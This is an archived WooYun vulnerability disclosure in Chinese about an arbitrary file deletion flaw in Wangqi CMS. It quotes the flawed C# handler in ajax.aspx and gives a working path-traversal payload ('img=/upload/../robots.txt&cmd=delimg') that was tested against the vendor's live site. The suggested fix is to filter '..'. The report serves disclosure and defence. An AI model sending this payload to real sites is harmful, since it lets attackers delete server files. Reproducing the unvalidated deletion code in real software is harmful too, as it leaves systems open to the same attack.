乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-26: 细节已通知厂商并且等待厂商处理中 2014-07-01: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-08-25: 细节向核心白帽子及相关领域专家公开 2014-09-04: 细节向普通白帽子公开 2014-09-14: 细节向实习白帽子公开 2014-09-21: 细节向公众公开
网奇最新版 存在任意文件删除访问<code>http://cms.wangqi.com/ajax.aspx</code>
ajax.aspx
http://cms.wangqi.com/ajax.aspx
源码如下
public void Page_Load(object sender, EventArgs e){ switch (base.Request.Form["cmd"]) { case "newsVars": this.method_18(); return; case "userJson": this.method_19(); return; case "digg": this.method_20(); return; case "login": this.method_21(false); return; case "loginAdm": this.method_21(true); return; case "titleDuplicate": this.method_16(); return; case "selSort": this.method_22(); return; case "msgRecent": this.method_25(); return; case "msgFriends": this.method_26(); return; case "msgGet": this.method_27(); return; case "msgPost": this.method_28(); return; case "friendAdd": this.method_23(); return; case "friendRemove": this.method_24(); return; case "usernameValid": this.method_17(); return; case "serverSet": this.method_15(); return; case "delimg": this.method_14(); //跟进 return;.......
private void method_14(){ if ((!string.IsNullOrEmpty(base.Request.Form["img"]) && (base.Request.Form["img"].ToLower().IndexOf("/upload/") > -1)) && File.Exists(base.Server.MapPath(base.Request.Form["img"]))) { File.Delete(base.Server.MapPath(base.Request.Form["img"])); //没处理..可跳出这个目录对任意文件进行删除了 } if (!string.IsNullOrEmpty(base.Request.Form["imgID"]) && (Convert.ToInt32(base.Request.Form["imgID"]) > 0)) { base.dbHelper.ExecuteNonQuery(CommandType.Text, "delete from wqcms_imgList where imgID=" + Convert.ToInt32(base.Request.Form["imgID"]), new IDataParameter[0]); }}
为了证明可以任意删除文件 我先访问下面的文件 是存在的
http://cms.wangqi.com/robots.txt
好的现在把这个文件删除了访问
提交
img=/upload/../robots.txt&cmd=delimg
然后在访问
删除了 同样可以删除任意文件
过滤 .. 防止跳出upload目录
危害等级:无影响厂商忽略
忽略时间:2014-09-21 10:52
暂无